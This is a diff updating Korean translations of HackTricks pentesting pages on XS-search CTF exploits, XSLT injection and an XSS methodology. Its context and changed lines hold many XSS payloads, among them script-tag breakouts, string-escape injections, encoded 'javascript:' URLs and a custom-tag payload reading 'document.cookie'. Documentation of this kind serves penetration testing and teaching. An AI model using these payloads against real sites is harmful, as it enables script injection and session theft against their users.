diff --git a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
index c7325ebbb..dd78c7da7 100644
--- a/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
+++ b/src/pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md
@@ -4,7 +4,7 @@
 
 In [**this exploit**](https://gist.github.com/aszx87410/155f8110e667bae3d10a36862870ba45), [**@aszx87410**](https://twitter.com/aszx87410)는 **lazy image side channel** 기법을 HTML 주입과 결합하여 **event loop blocking technique**을 사용해 문자를 유출합니다.
 
-이것은 다음 페이지에서 이미 언급된 **CTF 챌린지**를 위한 **다른 익스플로잇**입니다. 챌린지에 대한 더 많은 정보는 확인해 보세요:
+이것은 다음 페이지에서 이미 언급된 **CTF 챌린지**에 대한 **다른 익스플로잇**입니다. 챌린지에 대한 더 많은 정보는 다음을 참조하세요:
 
 {{#ref}}
 connection-pool-example.md
@@ -13,10 +13,10 @@ connection-pool-example.md
 이 익스플로잇의 아이디어는 다음과 같습니다:
 
 - 게시물은 알파벳 순으로 로드됩니다.
-- **공격자**는 **"A"**로 시작하는 **게시물**을 **주입**할 수 있으며, 그러면 큰 **`<canvas`**와 같은 **HTML 태그**가 대부분의 **화면**을 채우고 마지막에 **`<img lazy` 태그**가 로드됩니다.
-- 만약 "A" 대신 **공격자가 같은 게시물을 "z"로 시작하도록 주입**하면, **플래그**가 있는 **게시물**이 **먼저** 나타나고, 그 다음 **주입된** **게시물**이 초기 "z"와 함께 **큰** **canvas**와 함께 나타납니다. 플래그가 있는 게시물이 먼저 나타났기 때문에 첫 번째 캔버스가 화면을 모두 차지하고 마지막에 주입된 **`<img lazy`** 태그는 **화면에 보이지 않게** 되어 **로딩되지 않습니다**.
+- **공격자**는 **"A"**로 시작하는 **게시물**을 **주입**할 수 있으며, 그러면 큰 **`<canvas`**와 같은 **HTML 태그**가 대부분의 **화면**을 채우고 최종 **`<img lazy` 태그**가 로드됩니다.
+- 만약 **공격자가 "A"** 대신 **"z"**로 시작하는 동일한 게시물을 주입하면, **플래그**가 있는 **게시물**이 **먼저** 나타나고, 그 다음 **주입된** **게시물**이 초기 "z"와 함께 나타나며 **큰** **canvas**가 나타납니다. 플래그가 있는 게시물이 먼저 나타났기 때문에 첫 번째 캔버스가 화면을 모두 차지하고 최종 **`<img lazy`** 태그가 주입되었지만 **화면에 보이지 않게** 되어 **로드되지 않습니다**.
 - 그런 다음, **봇이** 페이지에 **접속하는 동안**, **공격자**는 **fetch 요청**을 **보냅니다**.&#x20;
-- 게시물에 주입된 **이미지**가 **로딩되고** 있다면, 이 **fetch** 요청은 **더 오래 걸리게** 되므로 공격자는 **게시물이 플래그보다 앞에** 있다는 것을 알 수 있습니다 (알파벳 순으로).
+- 게시물에 주입된 **이미지**가 **로드되고** 있다면, 이러한 **fetch** 요청은 **더 오래 걸리게** 되므로 공격자는 **게시물이 플래그보다 앞에** 있다는 것을 알 수 있습니다 (알파벳 순으로).
 - 만약 **fetch** 요청이 **빠르다면**, 이는 **게시물**이 **플래그** **뒤에** **알파벳 순으로** 있다는 것을 의미합니다.
 
 코드를 확인해 봅시다:
diff --git a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
index 4bdf3ab7a..0c0083652 100644
--- a/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
+++ b/src/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
@@ -4,7 +4,7 @@
 
 **Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
 
-이 도전에서 사용자는 수천 개의 문자를 보낼 수 있었고, 플래그가 포함되어 있으면 문자가 봇으로 다시 전송되었습니다. 따라서 많은 양의 문자를 보내면 공격자는 플래그가 전송된 문자열에 포함되어 있는지 여부를 측정할 수 있었습니다.
+이 도전에서 사용자는 수천 개의 문자를 보낼 수 있었고, 플래그가 포함되어 있다면 문자가 봇으로 다시 전송되었습니다. 따라서 많은 양의 문자를 보내면 공격자는 전송된 문자열에 플래그가 포함되어 있는지 측정할 수 있었습니다.
 
 > [!WARNING]
 > 처음에는 객체의 너비와 높이를 설정하지 않았지만, 나중에 로드 시간에 차이를 만들기에는 기본 크기가 너무 작기 때문에 중요하다는 것을 알게 되었습니다.
diff --git a/src/pentesting-web/xs-search/url-max-length-client-side.md b/src/pentesting-web/xs-search/url-max-length-client-side.md
index eaec78ec8..2bc40e200 100644
--- a/src/pentesting-web/xs-search/url-max-length-client-side.md
+++ b/src/pentesting-web/xs-search/url-max-length-client-side.md
@@ -2,7 +2,7 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-[https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)의 코드
+[https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)에서 가져온 코드
 ```html
 <html>
 <body></body>
diff --git a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
index 563de5399..3f145ca60 100644
--- a/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
+++ b/src/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
@@ -4,7 +4,7 @@
 
 ## 기본 정보
 
-XSLT는 XML 문서를 다양한 형식으로 변환하는 데 사용되는 기술입니다. 버전 1, 2, 3이 있으며, 버전 1이 가장 일반적으로 사용됩니다. 변환 과정은 서버 또는 브라우저 내에서 실행될 수 있습니다.
+XSLT는 XML 문서를 다양한 형식으로 변환하는 데 사용되는 기술입니다. 버전 1, 2, 3의 세 가지 버전이 있으며, 버전 1이 가장 일반적으로 사용됩니다. 변환 프로세스는 서버 또는 브라우저 내에서 실행될 수 있습니다.
 
 가장 자주 사용되는 프레임워크는 다음과 같습니다:
 
@@ -146,7 +146,7 @@ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 ```
 ### 버전
 
-사용된 XSLT 버전에 따라 더 많거나 적은 기능이 있을 수 있습니다:
+사용된 XSLT 버전에 따라 기능이 더 많거나 적을 수 있습니다:
 
 - [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/)
 - [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/)
@@ -367,12 +367,12 @@ version="1.0">
 </xsl:template>
 </xsl:stylesheet>
 ```
-(예시: [http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls))
+(Example from [http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls](http://laurent.bientz.com/Blog/Entry/Item/using_php_functions_in_xsl-7.sls))
 
 ## 더 많은 페이로드
 
-- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection) 확인
-- [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) 확인
+- Check [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSLT%20Injection)
+- Check [https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
 
 ## **브루트포스 탐지 목록**
 
diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md
index ae70aa93b..a6cfa48c9 100644
--- a/src/pentesting-web/xss-cross-site-scripting/README.md
+++ b/src/pentesting-web/xss-cross-site-scripting/README.md
@@ -2,32 +2,32 @@
 
 ## 방법론
 
-1. **당신이 제어하는 값** (_매개변수_, _경로_, _헤더_?, _쿠키_?)가 HTML에 **반영**되거나 **JS** 코드에 **사용**되고 있는지 확인합니다.
+1. **당신이 제어하는 값** (_매개변수_, _경로_, _헤더_?, _쿠키_?)가 HTML에 **반영**되거나 **JS** 코드에 의해 **사용**되는지 확인합니다.
 2. **반영/사용되는 맥락**을 찾습니다.
 3. **반영된 경우**
 1. **어떤 기호를 사용할 수 있는지** 확인하고, 그에 따라 페이로드를 준비합니다:
 1. **원시 HTML**에서:
-1. 새로운 HTML 태그를 생성할 수 있나요?
-2. `javascript:` 프로토콜을 지원하는 이벤트나 속성을 사용할 수 있나요?
-3. 보호를 우회할 수 있나요?
+1. 새로운 HTML 태그를 생성할 수 있습니까?
+2. `javascript:` 프로토콜을 지원하는 이벤트나 속성을 사용할 수 있습니까?
+3. 보호를 우회할 수 있습니까?
 4. HTML 콘텐츠가 클라이언트 측 JS 엔진 (_AngularJS_, _VueJS_, _Mavo_...)에 의해 해석되고 있다면, [**클라이언트 측 템플릿 주입**](../client-side-template-injection-csti.md)을 악용할 수 있습니다.
-5. JS 코드를 실행하는 HTML 태그를 생성할 수 없다면, [**덩글링 마크업 - HTML 스크립트리스 주입**](../dangling-markup-html-scriptless-injection/)을 악용할 수 있나요?
+5. JS 코드를 실행하는 HTML 태그를 생성할 수 없다면, [**덩글링 마크업 - HTML 스크립트리스 주입**](../dangling-markup-html-scriptless-injection/)을 악용할 수 있습니까?
 2. **HTML 태그** 내부에서:
-1. 원시 HTML 맥락으로 나갈 수 있나요?
-2. JS 코드를 실행하기 위해 새로운 이벤트/속성을 생성할 수 있나요?
-3. 당신이 갇힌 속성이 JS 실행을 지원하나요?
-4. 보호를 우회할 수 있나요?
+1. 원시 HTML 맥락으로 나갈 수 있습니까?
+2. JS 코드를 실행하기 위해 새로운 이벤트/속성을 생성할 수 있습니까?
+3. 당신이 갇힌 속성이 JS 실행을 지원합니까?
+4. 보호를 우회할 수 있습니까?
 3. **JavaScript 코드** 내부에서:
-1. `<script>` 태그를 이스케이프할 수 있나요?
-2. 문자열을 이스케이프하고 다른 JS 코드를 실행할 수 있나요?
-3. 템플릿 리터럴 \`\`에 입력이 있나요?
-4. 보호를 우회할 수 있나요?
+1. `<script>` 태그를 이스케이프할 수 있습니까?
+2. 문자열을 이스케이프하고 다른 JS 코드를 실행할 수 있습니까?
+3. 템플릿 리터럴 \`\`에 입력이 있습니까?
+4. 보호를 우회할 수 있습니까?
 4. 실행 중인 Javascript **함수**
 1. 실행할 함수의 이름을 지정할 수 있습니다. 예: `?callback=alert(1)`
 4. **사용된 경우**:
-1. **DOM XSS**를 악용할 수 있습니다. 입력이 어떻게 제어되는지, 그리고 **제어된 입력이 어떤 싱크에 사용되는지** 주의하세요.
+1. **DOM XSS**를 악용할 수 있습니다. 입력이 어떻게 제어되는지, 그리고 **제어된 입력이 어떤 싱크에 의해 사용되는지** 주의하십시오.
 
-복잡한 XSS 작업을 할 때 알아두면 유용한 정보:
+복잡한 XSS 작업을 할 때 알아두면 유용한 정보는 다음과 같습니다:
 
 {{#ref}}
 debugging-client-side-js.md
@@ -47,19 +47,19 @@ XSS를 악용하려고 할 때 가장 먼저 알아야 할 것은 **당신의 
 
 ### 원시 HTML
 
-당신의 입력이 **원시 HTML** 페이지에 **반영된다면**, JS 코드를 실행하기 위해 일부 **HTML 태그**를 악용해야 합니다: `<img , <iframe , <svg , <script` ... 이들은 당신이 사용할 수 있는 많은 가능한 HTML 태그 중 일부에 불과합니다.\
-또한, [클라이언트 측 템플릿 주입](../client-side-template-injection-csti.md)을 염두에 두세요.
+당신의 입력이 **원시 HTML** 페이지에 **반영된다면**, JS 코드를 실행하기 위해 일부 **HTML 태그**를 악용해야 합니다: `<img , <iframe , <svg , <script` ... 이들은 사용할 수 있는 많은 HTML 태그 중 일부에 불과합니다.\
+또한, [클라이언트 측 템플릿 주입](../client-side-template-injection-csti.md)을 염두에 두십시오.
 
 ### HTML 태그 속성 내부
 
-당신의 입력이 태그의 속성 값 내부에 반영된다면 시도해 볼 수 있습니다:
+당신의 입력이 태그의 속성 값 내부에 반영된다면 다음을 시도할 수 있습니다:
 
-1. **속성과 태그에서 이스케이프** (그럼 원시 HTML에 있게 됩니다)하고 악용할 새로운 HTML 태그를 생성합니다: `"><img [...]`
+1. **속성과 태그에서 이스케이프**하여 (그럼 원시 HTML에 있게 됩니다) 악용할 새로운 HTML 태그를 생성합니다: `"><img [...]`
 2. **속성에서 이스케이프할 수 있지만 태그에서 이스케이프할 수 없는 경우** (`>`가 인코딩되거나 삭제된 경우), 태그에 따라 **JS 코드를 실행하는 이벤트**를 생성할 수 있습니다: `" autofocus onfocus=alert(1) x="`
-3. **속성에서 이스케이프할 수 없는 경우** (`"`가 인코딩되거나 삭제된 경우), **어떤 속성**에 당신의 값이 반영되고 있는지에 따라 **모든 값을 제어하는지 아니면 일부만 제어하는지**에 따라 악용할 수 있습니다. 예를 들어, `onclick=`과 같은 이벤트를 제어할 수 있다면 클릭 시 임의의 코드를 실행할 수 있습니다. 또 다른 흥미로운 **예**는 `href` 속성으로, 여기서 `javascript:` 프로토콜을 사용하여 임의의 코드를 실행할 수 있습니다: **`href="javascript:alert(1)"`**
+3. **속성에서 이스케이프할 수 없는 경우** (`"`가 인코딩되거나 삭제된 경우), **어떤 속성**에 당신의 값이 반영되고 있는지에 따라 **모든 값을 제어하는지 아니면 일부만 제어하는지**에 따라 악용할 수 있습니다. 예를 들어, `onclick=`과 같은 이벤트를 제어하면 클릭 시 임의의 코드를 실행할 수 있습니다. 또 다른 흥미로운 **예**는 `href` 속성으로, `javascript:` 프로토콜을 사용하여 임의의 코드를 실행할 수 있습니다: **`href="javascript:alert(1)"`**
 4. 당신의 입력이 "**악용할 수 없는 태그**" 내부에 반영된다면, **`accesskey`** 트릭을 시도하여 취약점을 악용할 수 있습니다 (이를 악용하기 위해서는 어떤 형태의 사회 공학이 필요합니다): **`" accesskey="x" onclick="alert(1)" x="**
 
-클래스 이름을 제어할 수 있는 경우 Angular가 XSS를 실행하는 이상한 예:
+클래스 이름을 제어할 경우 Angular가 XSS를 실행하는 이상한 예:
 ```html
 <div ng-app>
 <strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
@@ -67,9 +67,15 @@ XSS를 악용하려고 할 때 가장 먼저 알아야 할 것은 **당신의 
 ```
 ### JavaScript 코드 내부
 
-이 경우 입력값은 HTML 페이지의 **`<script> [...] </script>`** 태그, `.js` 파일 또는 **`javascript:`** 프로토콜을 사용하는 속성 내에서 반영됩니다:
+이 경우 입력값은 HTML 페이지의 **`<script> [...] </script>`** 태그, `.js` 파일 내부 또는 **`javascript:`** 프로토콜을 사용하는 속성 내부에 반영됩니다:
 
-- **`<script> [...] </script>`** 태그 사이에 반영되는
+- **`<script> [...] </script>`** 태그 사이에 반영된 경우, 입력값이 어떤 종류의 따옴표 안에 있더라도 `</script>`를 주입하고 이 컨텍스트에서 탈출할 수 있습니다. 이는 **브라우저가 먼저 HTML 태그를 파싱**하고 그 다음에 내용을 처리하기 때문에, 주입된 `</script>` 태그가 HTML 코드 내부에 있다는 것을 인식하지 못합니다.
+- **JS 문자열 내부에 반영된 경우** 마지막 트릭이 작동하지 않으면 문자열에서 **탈출**하고, **코드를 실행**하며 **JS 코드를 재구성**해야 합니다 (오류가 발생하면 실행되지 않습니다):
+- `'-alert(1)-'`
+- `';-alert(1)//`
+- `\';alert(1)//`
+- 템플릿 리터럴 내부에 반영된 경우 `${ ... }` 구문을 사용하여 **JS 표현식**을 **삽입**할 수 있습니다: `` var greetings = `Hello, ${alert(1)}` ``
+- **유니코드 인코딩**은 **유효한 자바스크립트 코드**를 작성하는 데 사용됩니다:
 ```javascript
 alert(1)
 alert(1)
@@ -88,7 +94,7 @@ js-hoisting.md
 
 여러 웹 페이지에는 **실행할 함수의 이름을 매개변수로 받아들이는 엔드포인트**가 있습니다. 실제로 흔히 볼 수 있는 예는 `?callback=callbackFunc`와 같은 것입니다.
 
-사용자가 직접 제공한 것이 실행되려고 하는지 확인하는 좋은 방법은 **매개변수 값을 수정하는 것**(예: 'Vulnerable'로)이고, 콘솔에서 다음과 같은 오류를 찾는 것입니다:
+사용자가 직접 제공한 것이 실행되려고 하는지 알아내는 좋은 방법은 **매개변수 값을 수정하는 것**(예: 'Vulnerable'로 변경)이고, 콘솔에서 다음과 같은 오류를 찾는 것입니다:
 
 ![](<../../images/image (711).png>)
 
@@ -141,9 +147,9 @@ server-side-xss-dynamic-pdf.md
 
 ![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](<../../images/EauBb2EX0AERaNK (1).jpg>)
 
-## 원시 HTML 내부 주입
+## 원시 HTML 내 주입
 
-당신의 입력이 **HTML 페이지 내부에 반영**되거나 이 맥락에서 HTML 코드를 이스케이프하고 주입할 수 있다면, **첫 번째**로 해야 할 일은 `<`를 악용하여 새로운 태그를 생성할 수 있는지 확인하는 것입니다: 그냥 **그 문자**를 **반영**해보고 그것이 **HTML 인코딩**되었는지, **삭제**되었는지, 아니면 **변경 없이 반영**되었는지 확인하세요. **마지막 경우에만 이 경우를 악용할 수 있습니다**.\
+당신의 입력이 **HTML 페이지 내에서 반영**되거나 이 맥락에서 HTML 코드를 이스케이프하고 주입할 수 있다면, **첫 번째**로 해야 할 일은 `<`를 악용하여 새로운 태그를 생성할 수 있는지 확인하는 것입니다: 그냥 **그 문자**를 **반영**해보고 그것이 **HTML 인코딩**되었는지 또는 **삭제**되었는지, 아니면 **변경 없이 반영**되었는지 확인하세요. **마지막 경우에만 이 경우를 악용할 수 있습니다**.\
 이 경우에도 **[클라이언트 측 템플릿 주입](../client-side-template-injection-csti.md)**을 염두에 두세요.\
 &#xNAN;_**참고: HTML 주석은 다음을 사용하여 닫을 수 있습니다\*\*\*\*\*\***&#x20;\***\*`-->`\*\***&#x20;\***\*또는 \*\*\*\*\*\***`--!>`\*\**_
 
@@ -155,16 +161,16 @@ alert(1)
 <img src="x" onerror="alert(1)" />
 <svg onload=alert('XSS')>
 ```
-하지만, tags/attributes 블랙/화이트리스트가 사용되고 있다면, 어떤 **태그를 생성할 수 있는지** **브루트 포스**해야 합니다.\
-어떤 태그가 허용되는지 **찾은 후**, 발견된 유효한 태그 내에서 **속성/이벤트를 브루트 포스**하여 어떻게 공격할 수 있는지 확인해야 합니다.
+하지만, 태그/속성 블랙리스트/화이트리스트가 사용되고 있다면, 어떤 태그를 생성할 수 있는지 **브루트 포스**해야 합니다.\
+어떤 태그가 허용되는지 **찾은 후**, 발견된 유효한 태그 내에서 **속성/이벤트를 브루트 포스**하여 공격할 수 있는 방법을 확인해야 합니다.
 
 ### 태그/이벤트 브루트 포스
 
-[**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)로 가서 _**태그를 클립보드에 복사**_를 클릭하세요. 그런 다음, Burp intruder를 사용하여 모든 태그를 전송하고 WAF에 의해 악성으로 발견되지 않은 태그가 있는지 확인하세요. 사용할 수 있는 태그를 발견한 후, 유효한 태그를 사용하여 **모든 이벤트를 브루트 포스**할 수 있습니다(같은 웹 페이지에서 _**이벤트를 클립보드에 복사**_를 클릭하고 이전과 같은 절차를 따르세요).
+[**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)로 가서 _**태그를 클립보드에 복사**_를 클릭하세요. 그런 다음, Burp intruder를 사용하여 모든 태그를 전송하고 WAF에서 악성으로 발견되지 않은 태그가 있는지 확인하세요. 사용할 수 있는 태그를 발견한 후, 유효한 태그를 사용하여 **모든 이벤트를 브루트 포스**할 수 있습니다(같은 웹 페이지에서 _**이벤트를 클립보드에 복사**_를 클릭하고 이전과 같은 절차를 따르세요).
 
 ### 사용자 정의 태그
 
-유효한 HTML 태그를 찾지 못한 경우, **사용자 정의 태그를 생성**하고 `onfocus` 속성으로 JS 코드를 실행해 볼 수 있습니다. XSS 요청에서 URL을 `#`로 끝내야 페이지가 **해당 객체에 포커스**하고 **코드를 실행**합니다:
+유효한 HTML 태그를 찾지 못했다면, **사용자 정의 태그를 생성**하고 `onfocus` 속성으로 JS 코드를 실행해 볼 수 있습니다. XSS 요청에서 URL을 `#`로 끝내야 페이지가 **해당 객체에 포커스**하고 **코드를 실행**합니다:
 ```
 /?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
 ```
@@ -261,7 +267,7 @@ onerror=alert`1`
 ```
 ### 속성 내에서
 
-속성에서 **탈출할 수 없는 경우**(`"`가 인코딩되거나 삭제됨)에도 불구하고, **어떤 속성**에 값이 반영되는지에 따라 **모든 값 또는 일부만 제어하는 경우** 이를 악용할 수 있습니다. **예를 들어**, `onclick=`와 같은 이벤트를 제어하면 클릭할 때 임의의 코드를 실행할 수 있습니다.\
+속성에서 **탈출할 수 없는 경우**(`"`가 인코딩되거나 삭제됨)에도 불구하고, **어떤 속성**에 값이 반영되는지에 따라 **모든 값을 제어하는지 또는 일부만 제어하는지**에 따라 이를 악용할 수 있습니다. **예를 들어**, `onclick=`와 같은 이벤트를 제어하면 클릭할 때 임의의 코드를 실행할 수 있습니다.\
 또 다른 흥미로운 **예**는 `href` 속성으로, 여기서 `javascript:` 프로토콜을 사용하여 임의의 코드를 실행할 수 있습니다: **`href="javascript:alert(1)"`**
 
 **HTML 인코딩/URL 인코딩을 사용한 이벤트 내 우회**
@@ -297,7 +303,7 @@ HTML 태그 속성의 값 내 **HTML 인코딩된 문자**는 **런타임에 디
 ```
 ### 특수 프로토콜 속에서
 
-여기에서 **`javascript:`** 또는 **`data:`** 프로토콜을 사용하여 **임의의 JS 코드를 실행**할 수 있는 몇 가지 장소가 있습니다. 일부는 사용자 상호작용이 필요하고 일부는 필요하지 않습니다.
+여기에서는 **`javascript:`** 또는 **`data:`** 프로토콜을 사용하여 **임의의 JS 코드를 실행**할 수 있는 몇 가지 장소가 있습니다. 일부는 사용자 상호작용을 요구하고 일부는 요구하지 않습니다.
 ```javascript
 javascript:alert(1)
 JavaSCript:alert(1)
@@ -355,7 +361,7 @@ _**이 경우, 이전 섹션의 HTML 인코딩 및 유니코드 인코딩 기법
 
 **`javascript:`와 함께 Hex 및 Octal 인코딩 사용하기**
 
-**Hex** 및 **Octal 인코딩**을 사용하여 `iframe`의 `src` 속성 안에서 (최소한) **JS를 실행할 HTML 태그를 선언할 수 있습니다**:
+`iframe`의 `src` 속성 안에서 (최소한) **HTML 태그를 선언하여 JS를 실행하기 위해** **Hex** 및 **Octal 인코딩**을 사용할 수 있습니다:
 ```javascript
 //Encoded: <svg onload=alert(1)>
 // This WORKS
@@ -367,11 +373,11 @@ _**이 경우, 이전 섹션의 HTML 인코딩 및 유니코드 인코딩 기법
 <svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
 <svg onload=javascript:'\141\154\145\162\164\50\61\51' />
 ```
-### 리버스 탭 내빙
+### 리버스 탭 나빙
 ```javascript
 <a target="_blank" rel="opener"
 ```
-임의의 **`<a href=`** 태그에 **`target="_blank" and rel="opener"`** 속성이 포함된 URL을 주입할 수 있는 경우, 이 동작을 악용하기 위해 **다음 페이지를 확인하세요**:
+임의의 **`<a href=`** 태그에 **`target="_blank"` 및 `rel="opener"`** 속성이 포함된 URL을 주입할 수 있는 경우, 이 동작을 악용하기 위해 **다음 페이지를 확인하세요**:
 
 {{#ref}}
 ../reverse-tab-nabbing.md
@@ -395,14 +401,14 @@ Firefox: %09 %20 %28 %2C %3B
 Opera: %09 %20 %2C %3B
 Android: %09 %20 %28 %2C %3B
 ```
-### "사용할 수 없는 태그"에서의 XSS (숨겨진 입력, 링크, 표준, 메타)
+### XSS in "Unexploitable tags" (hidden input, link, canonical, meta)
 
-[**여기**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **숨겨진 입력을 악용하는 것이 이제 가능해졌습니다:**
+From [**here**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **이제 숨겨진 입력을 악용할 수 있습니다:**
 ```html
 <button popvertarget="x">Click me</button>
 <input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />
 ```
-그리고 **메타 태그**:
+그리고 **메타 태그**에서:
 ```html
 <!-- Injection inside meta attribute-->
 <meta
@@ -416,7 +422,7 @@ onbeforetoggle="alert(2)" />
 <button popovertarget="newsletter">Subscribe to newsletter</button>
 <div popover id="newsletter">Newsletter popup</div>
 ```
-다음에서 [**여기**](https://portswigger.net/research/xss-in-hidden-input-fields): **숨겨진 속성** 내에서 **XSS 페이로드**를 실행할 수 있으며, 이를 위해 **희생자**가 **키 조합**을 누르도록 **설득**해야 합니다. Firefox Windows/Linux에서 키 조합은 **ALT+SHIFT+X**이고, OS X에서는 **CTRL+ALT+X**입니다. 접근 키 속성에서 다른 키를 사용하여 다른 키 조합을 지정할 수 있습니다. 벡터는 다음과 같습니다:
+다음의 [**여기**](https://portswigger.net/research/xss-in-hidden-input-fields)에서: **숨겨진 속성** 내에서 **XSS 페이로드**를 실행할 수 있으며, 이를 위해 **희생자**가 **키 조합**을 누르도록 **설득**해야 합니다. Firefox Windows/Linux에서 키 조합은 **ALT+SHIFT+X**이고, OS X에서는 **CTRL+ALT+X**입니다. 접근 키 속성에서 다른 키를 사용하여 다른 키 조합을 지정할 수 있습니다. 다음은 벡터입니다:
 ```markup
 <input type="hidden" accesskey="X" onclick="alert(1)">
 ```
@@ -424,7 +430,7 @@ onbeforetoggle="alert(2)" />
 
 ### 블랙리스트 우회
 
-이 섹션에서는 다양한 인코딩을 사용하는 여러 가지 트릭이 이미 공개되었습니다. **다시 돌아가서 다음을 배울 수 있는 곳을 확인하세요:**
+이 섹션에서는 다양한 인코딩을 사용하는 몇 가지 트릭이 이미 공개되었습니다. **다시 돌아가서 다음을 배울 수 있는 곳을 확인하세요:**
 
 - **HTML 인코딩 (HTML 태그)**
 - **유니코드 인코딩 (유효한 JS 코드일 수 있음):** `\u0061lert(1)`
@@ -462,7 +468,7 @@ onbeforetoggle="alert(2)" />
 
 ## JavaScript 코드 내 주입
 
-이 경우 **입력**이 `.js` 파일의 JS 코드 내에서 **반영**되거나 `<script>...</script>` 태그 사이, JS 코드를 실행할 수 있는 HTML 이벤트 사이, 또는 `javascript:` 프로토콜을 수용하는 속성 사이에 있을 것입니다.
+이 경우 **입력**이 `.js` 파일의 JS 코드 내에 **반영**되거나 `<script>...</script>` 태그 사이, JS 코드를 실행할 수 있는 HTML 이벤트 사이, 또는 `javascript:` 프로토콜을 수용하는 속성 사이에 있을 것입니다.
 
 ### \<script> 태그 이스케이프
 
@@ -470,11 +476,11 @@ onbeforetoggle="alert(2)" />
 ```javascript
 </script><img src=1 onerror=alert(document.domain)>
 ```
-이 예제에서는 **단일 인용부호를 닫지 않았습니다**. 이는 **HTML 파싱이 먼저 브라우저에 의해 수행되기 때문입니다**, 여기에는 페이지 요소 식별, 스크립트 블록 포함이 포함됩니다. JavaScript의 파싱은 내장된 스크립트를 이해하고 실행하기 위해 그 이후에만 수행됩니다.
+이 예제에서는 **단일 인용부호를 닫지 않았습니다**. 이는 **HTML 파싱이 먼저 브라우저에 의해 수행되기 때문**입니다. 여기에는 페이지 요소, 즉 스크립트 블록을 식별하는 과정이 포함됩니다. JavaScript의 파싱은 내장된 스크립트를 이해하고 실행하기 위해 그 이후에 수행됩니다.
 
 ### JS 코드 내부
 
-`<>`가 정리되고 있다면 여전히 **문자열을 이스케이프**할 수 있으며, 입력이 **위치한 곳**에서 **임의의 JS를 실행**할 수 있습니다. JS 구문을 **수정하는 것이 중요**합니다. 오류가 있을 경우 JS 코드가 실행되지 않기 때문입니다:
+`<>`가 정리되고 있다면 여전히 **문자열을 이스케이프**할 수 있으며, 입력이 **위치한 곳에서** **임의의 JS를 실행**할 수 있습니다. JS 구문을 **수정하는 것이 중요**합니다. 오류가 발생하면 JS 코드가 실행되지 않기 때문입니다:
 ```
 '-alert(document.domain)-'
 ';alert(document.domain)//
@@ -482,7 +488,7 @@ onbeforetoggle="alert(2)" />
 ```
 ### 템플릿 리터럴 \`\`
 
-단일 및 이중 따옴표 외에 **문자열**을 구성하기 위해 JS는 **백틱** **` `` `** 도 허용합니다. 이는 `${ ... }` 구문을 사용하여 **JS 표현식**을 **내장**할 수 있기 때문에 템플릿 리터럴로 알려져 있습니다.\
+단일 및 이중 따옴표 외에 **문자열**을 구성하기 위해 JS는 **백틱** **` `` `**도 허용합니다. 이는 `${ ... }` 구문을 사용하여 **JS 표현식**을 **내장**할 수 있기 때문에 템플릿 리터럴로 알려져 있습니다.\
 따라서 입력이 백틱을 사용하는 JS 문자열 내에서 **반영**되고 있음을 발견하면, `${ ... }` 구문을 악용하여 **임의의 JS 코드**를 실행할 수 있습니다:
 
 이것은 다음과 같이 **악용**될 수 있습니다:
@@ -556,7 +562,7 @@ eval(8680439..toString(30))(983801..toString(36))
 #!This is a 1 line comment, but "#!" must to be at the beggining of the first line
 -->This is a 1 line comment, but "-->" must to be at the beggining of the first line
 ```
-**JavaScript 새 줄 (from** [**JavaScript 새 줄**](./#javascript-new-lines) **trick)**
+**JavaScript 새 줄 (에서** [**JavaScript 새 줄**](./#javascript-new-lines) **트릭)**
 ```javascript
 //Javascript interpret as new line these chars:
 String.fromCharCode(10)
@@ -754,13 +760,13 @@ dom-xss.md
 
